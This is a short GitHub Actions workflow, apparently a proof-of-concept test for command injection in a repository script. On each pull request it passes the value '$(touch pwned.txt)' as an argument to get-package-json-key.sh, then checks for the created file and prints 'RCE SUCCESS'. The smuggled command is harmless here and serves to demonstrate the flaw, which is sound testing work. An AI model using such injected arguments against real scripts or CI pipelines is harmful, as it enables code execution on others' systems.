# .github/workflows/test.yml
on: [pull_request]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: chmod +x scripts/get-package-json-key.sh
      - run: ./scripts/get-package-json-key.sh '$(touch pwned.txt)' OUT
      - run: ls -la pwned.txt && echo "RCE SUCCESS"
